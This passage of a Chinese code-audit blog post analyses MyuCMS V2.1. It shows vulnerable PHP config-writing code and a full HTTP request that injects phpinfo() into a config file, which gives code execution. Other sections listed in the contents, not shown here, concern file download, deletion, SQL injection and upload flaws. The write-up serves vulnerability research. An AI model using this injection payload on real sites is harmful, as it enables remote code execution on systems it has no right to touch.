class="keyword">function</span> <span class="title">add</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">       $path = <span class="string">'application/extra/web.php'</span>;</span><br><span class="line">       $file = <span class="keyword">include</span> $path;      <span class="comment">// $file 的内容为 web.php 中返回的配置数组的值</span></span><br><span class="line">       $config = <span class="keyword">array</span>( <span class="comment">// 读取 post 中提交的配置内容</span></span><br><span class="line">         <span class="string">'WEB_RXT'</span> =&gt; input(<span class="string">'WEB_RXT'</span>),</span><br><span class="line">         <span class="string">'WEB_GL'</span> =&gt; input(<span class="string">'WEB_GL'</span>),</span><br><span class="line">		 <span class="string">'WEB_REG'</span> =&gt; input(<span class="string">'WEB_REG'</span>),</span><br><span class="line">		 <span class="string">'WEB_TAG'</span> =&gt; input(<span class="string">'WEB_TAG'</span>),</span><br><span class="line">		 <span class="string">'WEB_OPE'</span> =&gt; input(<span class="string">'WEB_OPE'</span>),</span><br><span class="line">         <span class="string">'WEB_BUG'</span> =&gt; input(<span class="string">'WEB_BUG'</span>),</span><br><span class="line">         <span class="string">'WEB_BBS'</span> =&gt; input(<span class="string">'WEB_BBS'</span>),</span><br><span class="line">         <span class="string">'WEB_SHOP'</span> =&gt; input(<span class="string">'WEB_SHOP'</span>),</span><br><span class="line">         <span class="string">'WEB_INDEX'</span> =&gt; input(<span class="string">'WEB_INDEX'</span>),</span><br><span class="line">         <span class="string">'WEB_KEJIAN'</span> =&gt; input(<span class="string">'WEB_KEJIAN'</span>),</span><br><span class="line">         <span class="string">'WEB_KEJIANS'</span> =&gt; input(<span class="string">'WEB_KEJIANS'</span>),</span><br><span class="line">         <span class="string">'Cascade'</span> =&gt; input(<span class="string">'Cascade'</span>),</span><br><span class="line">         <span class="comment">//七牛</span></span><br><span class="line">         <span class="string">'bucket'</span> =&gt; input(<span class="string">'bucket'</span>),</span><br><span class="line">         <span class="string">'accessKey'</span> =&gt; input(<span class="string">'accessKey'</span>),</span><br><span class="line">         <span class="string">'secrectKey'</span> =&gt; input(<span class="string">'secrectKey'</span>),</span><br><span class="line">         <span class="string">'domain'</span> =&gt; input(<span class="string">'domain'</span>),</span><br><span class="line">         <span class="string">'qiniuopen'</span> =&gt; input(<span class="string">'qiniuopen'</span>),</span><br><span class="line">       );</span><br><span class="line">        $res = array_merge($file, $config); <span class="comment">// 合并两个数组</span></span><br><span class="line">        $str = <span class="string">'&lt;?php return ['</span>;</span><br><span class="line">        <span class="keyword">foreach</span> ($res <span class="keyword">as</span> $key =&gt; $value) &#123; <span class="comment">// 循环数组，生成新的配置内容</span></span><br><span class="line">            $str .= <span class="string">'\''</span> . $key . <span class="string">'\''</span> . <span class="string">'=&gt;'</span> . <span class="string">'\''</span> . $value . <span class="string">'\''</span> . <span class="string">','</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        $str .= <span class="string">']; '</span>;</span><br><span class="line">        <span class="keyword">if</span> (file_put_contents($path, $str)) &#123; <span class="comment">// 将配置内容写入 web.php 文件</span></span><br><span class="line">            <span class="keyword">return</span> json(<span class="keyword">array</span>(<span class="string">'code'</span> =&gt; <span class="number">200</span>, <span class="string">'msg'</span> =&gt; <span class="string">'修改成功'</span>));</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> json(<span class="keyword">array</span>(<span class="string">'code'</span> =&gt; <span class="number">0</span>, <span class="string">'msg'</span> =&gt; <span class="string">'修改失败'</span>));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></div></figure>

        <h3 id="Payload-4"   >
          <a href="#Payload-4" class="heading-link"><i class="fas fa-link"></i></a>Payload</h3>
      <p>Payload数据包如下：</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;admin&#x2F;config&#x2F;add.html HTTP&#x2F;1.1</span><br><span class="line">Host: www.myu.io</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko&#x2F;20100101 Firefox&#x2F;72.0</span><br><span class="line">Accept: *&#x2F;*</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded; charset&#x3D;UTF-8</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">Content-Length: 327</span><br><span class="line">Origin: http:&#x2F;&#x2F;www.myu.io</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http:&#x2F;&#x2F;www.myu.io&#x2F;admin&#x2F;config&#x2F;index.html</span><br><span class="line">Cookie: PHPSESSID&#x3D;l6ijpio06mqmhcdq654g63eq90; UM_distinctid&#x3D;170343d2b4a291-0a4e487f247e62-4c302978-1fa400-170343d2b4b28f; CNZZDATA1277972876&#x3D;1874892142-1581419669-%7C1581432904; XDEBUG_SESSION&#x3D;XDEBUG_ECLIPSE</span><br><span class="line"></span><br><span class="line">WEB_KEJIAN&#x3D;0&amp;WEB_KEJIANS&#x3D;0&amp;WEB_INDEX&#x3D;bbs&#39;,phpinfo(),&#39;&amp;WEB_RXT&#x3D;rar,png,zip,jpg,gif,ico,7z&amp;qiniuopen&#x3D;0&amp;secrectKey&#x3D;0&amp;accessKey&#x3D;0&amp;domain&#x3D;0&amp;bucket&#x3D;0&amp;Cascade&#x3D;1&amp;WEB_BUG&#x3D;true&amp;WEB_REG&#x3D;1&amp;WEB_OPE&#x3D;1&amp;WEB_GL&#x3D;0&amp;WEB_BBS&#x3D;1&amp;WEB_SHOP&#x3D;1&amp;WEB_TAG&#x3D;%e6%8f%92%e4%bb%b6%2c%e5%bb%ba%e8%ae%ae%2c%e6%a8%a1%e6%9d%bf%2c%e7%ad%be%e5%88%b0%2c%e5%8f%8d%e9%a6%88</span><br></pre></td></tr></table></div></figure>
<p>写入的内容和效果如下：</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e4391472fb38b8c3cc86b1e.jpg"  alt="">
      </p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="https://pic.downk.cc/item/5e4391972fb38b8c3cc8794f.jpg"  alt="">
      </p>

        <h1 id="结束"   >
          <a href="#结束" class="heading-link"><i class="fas fa-link"></i></a>结束</h1>
      <p>限于水平有限，有些 <strong>CNVD</strong> 上有记录到的洞没分析到。我也看了官网最新的 <strong>V2.2.3</strong> 版本针对某些漏洞的修复是不完善的，针对最新版本，鉴于目前官网没有修复，就不写了。</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://www.7ten7.top">7TEN7</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://www.7ten7.top/2020/02/11/2020-02-11-MyuCMS_V2.1%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">http://www.7ten7.top/2020/02/11/2020-02-11-MyuCMS_V2.1%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://www.7ten7.top/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2020/02/15/2020-02-15-%E5%A6%82%E4%BD%95%E9%94%A4%E4%B8%80%E4%B8%AA%E5%A4%96%E6%8C%82%E7%BD%91%E7%AB%99/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">如何锤一个外挂网站</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2020/01/01/2020-01-01-Python+PHP%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E9%94%AE%E7%9B%98%E8%AE%B0%E5%BD%95/"><span class="paginator-prev__text">Python+PHP实现远程键盘记录</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="valine-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">
          前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#过程分析"><span class="toc-number">2.</span> <span class="toc-text">
          过程分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前台任意文件下载（中危）"><span class="toc-number">2.1.</span> <span class="toc-text">
          前台任意文件下载（中危）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload"><span class="toc-number">2.1.1.</span> <span class="toc-text">
          Payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#任意目录删除漏洞（高危）"><span class="toc-number">2.2.</span> <span class="toc-text">
          任意目录删除漏洞（高危）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">
          Payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL注入漏洞（高危）"><span class="toc-number">2.3.</span> <span class="toc-text">
          SQL注入漏洞（高危）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload-2"><span class="toc-number">2.3.1.</span> <span class="toc-text">
          Payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件上传漏洞（高危）"><span class="toc-number">2.4.</span> <span class="toc-text">
          文件上传漏洞（高危）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload-3"><span class="toc-number">2.4.1.</span> <span class="toc-text">
          Payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#命令执行（高危）"><span class="toc-number">2.5.</span> <span class="toc-text">
          命令执行（高危）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Payload-4"><span class="toc-number">2.5.1.</span> <span class="toc-text">
          Payload</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#结束"><span class="toc-number">3.</span> <span class="toc-text">
          结束</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/author/author.png" alt="avatar"></div><p class="sidebar-ov-author__text">7TEN7</p></div><div class="sidebar-ov-feed"><span class="sidebar-ov-feed-rss"><a class="sidebar-ov-feed-rss__link" href="/atom.xml" target="_blank" rel="noopener"><span class="sidebar-ov-feed-rss__icon"><i class="fas fa-rss"></i></span><span>RSS 订阅</span></a></span></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">55</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">32</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__devider"></span><span>7TEN7</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1.0.1/dist/canvas-nest.min.js" color="255,255,255" opacity="1" count="200" zIndex="-1"></script><script src="https://cdn.jsdelivr.net/npm/lazyload@2.0.0-rc.2/lazyload.min.js"></script><script src="https://cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script>function loadValine () {
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var guest_info = 'nick,mail,link';

  guest_info = guest_info.split(',').filter(function(item) {
    return GUEST_INFO.indexOf(item) > -1;
  });
  new Valine({
    el: '#valine-container',
    appId: 'Nzl7LsK4moQuOsIfeWfbc8Rz-gzGzoHsz',
    appKey: '5xmoJuWrMWHpI7pwtJviyIh6',
    notify: true,
    verify: true,
    placeholder: 'Just go go',
    avatar: 'mp',
    meta: guest_info,
    pageSize: '10' || 10,
    visitor: false,
    recordIP: true,
    lang: '' || 'zh-cn',
    path: window.location.pathname
  });
}

if (false) {
  loadValine();
} else {
  window.addEventListener('DOMContentLoaded', loadValine, false);
}</script><script src="/js/utils.js?v=2.5.0"></script><script src="/js/stun-boot.js?v=2.5.0"></script><script src="/js/scroll.js?v=2.5.0"></script><script src="/js/header.js?v=2.5.0"></script><script src="/js/sidebar.js?v=2.5.0"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/assets/shizuku.model.json"},"display":{"position":"right","width":260,"height":380,"vOffset":5},"mobile":{"show":true},"log":false});</script></body></html>